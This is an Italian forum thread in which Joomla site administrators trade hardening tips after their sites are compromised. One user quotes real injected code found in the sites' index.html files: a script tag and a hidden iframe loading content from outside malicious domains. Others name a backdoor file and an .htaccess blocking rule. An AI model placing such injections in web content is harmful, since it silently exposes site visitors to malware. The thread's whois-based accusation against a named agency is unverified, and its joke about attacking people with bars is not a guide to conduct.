files malevoli e attacchi - consigli e accorgimenti per la sicurezza di joomla

[peterrey]

vedi questo post http://forum.joomla.org/viewtopic.php?f=267&t=353314

[gippy88]

anche i permessi erano ok 

[peterrey]

per il seo usi qualche componente ?
usi qualche componente che è presente su tutti i siti?

[gippy88]

no niente seo.

i componenti presenti su tutti adesso sono quelli citati prima per la sicurezza (eyesite, jsecure, joomlpack)

 

dire che sono disperato e dire poco.

devo rimettere apposto una trentina di siti, e cerchero di farli in questa nottata

[gippy88]

sto consultando il forum security di joomla.org, inizio a raccogliere info e a postarle qui.

per ora ho letto che è consigliato utilizzare il mod rewriter e il mod security.

anche se da quel che ho letto il mod security si trova dentro apache quindi e compito dell'hoster, giusto??


chi ne sa qualcosa in più?

[gippy88]

vi segnalo questo fantastico post

http://forum.joomla.org/viewtopic.php?f=432&t=391251

sto apportando le modifiche che vengono suggerite, vi faccio sapere.

spero di risolvere cosi almeno dopo settimane di nottate passate a ripristinare siti forse riusciro a dormire.

oppure mi impicco....

[foxhy]

Ciao gippy88, ho visto che hai scritto un post su:
http://forum.joomla.org/viewtopic.php?f=432&t=391251
Che riguarda la modifica del file .htaccess, ho fatto una prova in locale e ho avuto lo stesso problema "error 500".
Lunica cosa che sono riuscito a capire è che l'errore dipende dalla riga dove c'è questa istruzione:

Codice: [Seleziona]

# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]
Eliminando questa riga tutto funziona perfettamente.
Ora la domanda è che cosa c'è che non va in questo codice?
Ci vorrebbe l'aiuto di qualche esperto....speriamo!

[gippy88]

grazie foxhy!

io invece ho brutte notizie, nonostante tutte quelle precauzioni oggi controllando un sito mi sono ritrovato tutti gli index.html (quelli che trovi in ogni cartella vuoti)

con il seguente codice..

<html><script src=http://haaijk.nl/images/index.php ></script><body bgcolor="#FFFFFF"></body></html>

oppure

<html><body bgcolor="#FFFFFF"></body></html><iframe qhdik='gpPJWim3' src='http://googie-analytics.ws/in.cgi?3 ' rybbb='Yv9nZtVg' width='0' height='0' style='display:none'></iframe>

o ancora peggio pagine e pagine piene di codice binario...

tutto ciò è molto grave, i permessi sono impostati con accuratezza cosi come descritto in quel post di joomla.org che ho citato.


come è possibile secondo voi?

ma il team di joomla è al corrente di tutto ciò?

[gippy88]

come si spiega che tutti i file index.html che si trovano in ogni cartella dopo un pò di giorni vengono TUTTI riempiti di script malevoli??

premettendo che i permessi su questi file sono 644, come è possibile??

[56francesco]

gippy88 tieni per caso un contatore di visite esterno?

[gippy88]

no, nessun componente strano, solo quelli standard, quelli che ho aggiunto io sono eyesite, joomlapack, jsecure.
ccnewsletter, l'ho disattivato momentaneamente.

joomla reservation ho visto che è tra le componenti non sicure e ho tolto anche quello.

oziogallery2 è l'unico componente aggiuntivo installato.

cmq al momento ho risolto per tutti gli altri siti, solo questo in questione è stato nuovamente attaccato.

che ne pensate?
template jaw012.

[56francesco]

eyesite,

che roba sarebbe?

[foxhy]

Secondo me entrano per vie diverse, una cosa simile mi era capitata alcuni mesi fa su alcuni siti. leggi questo post ti potrebbe aiutare a capire
http://forum.joomla.it/index.php/topic,66172.msg289508.html#msg289508

In sostanza quando qualcuno riesce ad entrare con permessi FTP, si assicura gli accessi successivi inserendo una sua porta di ingresso personalizzata. Devi controllare uno per uno tutti i file e le cartelle del tuo sito "UNA BELLA SCANSIONE PROFONDA".

[gippy88]

si per il template e moduli/componenti aggiuntivi faccio cosi, me li controllo tutti, (grazie a konqueror lo faccio molto velocemente), per il resto copio sovrascrivendo le cartelle administrator, component ecc ecc i file originali di installazione di joomla, tranne ovviamente la cartela installation, cosi mi rimette tutto apposto, poi grazie abackup etc sto risolvendo, ad oggi credo di aver risolto, almeno il 90% dei problemi che avevo prima.

per quanto riguarda quel sito che mi si era nuovamente infettato ho trovato un file .php nella cartella images che avevo caricato io nuovamente da un backup vecchio già corrotto. ora a quanto pare ho risolto definitivamente.


com_eyesite è un componente che controlla gli accessi "strani" al sito.
è consigliato anche nel forum sicurezza joomla.org

grazie ragazzi, teniamoci in contatti per ulteriori trucchetti e soluzioni.

buon lavoro

[56francesco]

per quanto riguarda quel sito che mi si era nuovamente infettato ho trovato un file .php nella cartella images che avevo caricato io nuovamente da un backup vecchio già corrotto.

[gippy88]

cioè?

[gippy88]

ragazzi un altro trucchetto.

nel caso vi troviate il sito infetto.
la prima cosa da controllare è la cartella images, dentro ci troverete un file gifimg.php ovviamente eliminatelo.

[gippy88]

quando passate tra una pagina e l'altra del backend e frontend in basso nel vostro browser potete vedere...
caricamento da "vostro sito"
se avete caricamento da qualche altro sito dovete preoccuparvi.

ho riscontrato che quasi sempre
quando esce qualcos'altro (e quindi siete nei guai)
gli altri siti che escono sono

prathams.in
aaijack.nl

entrambi i siti se visitati non permettono l'accesso. ma facendo un who.is si può notate che il propietario è http://dcd.in/ un'agenzia di webdesign.

non sarà mica il caso di fargli una visita muniti di spranghe??!!

possiamo organizzare un pullman??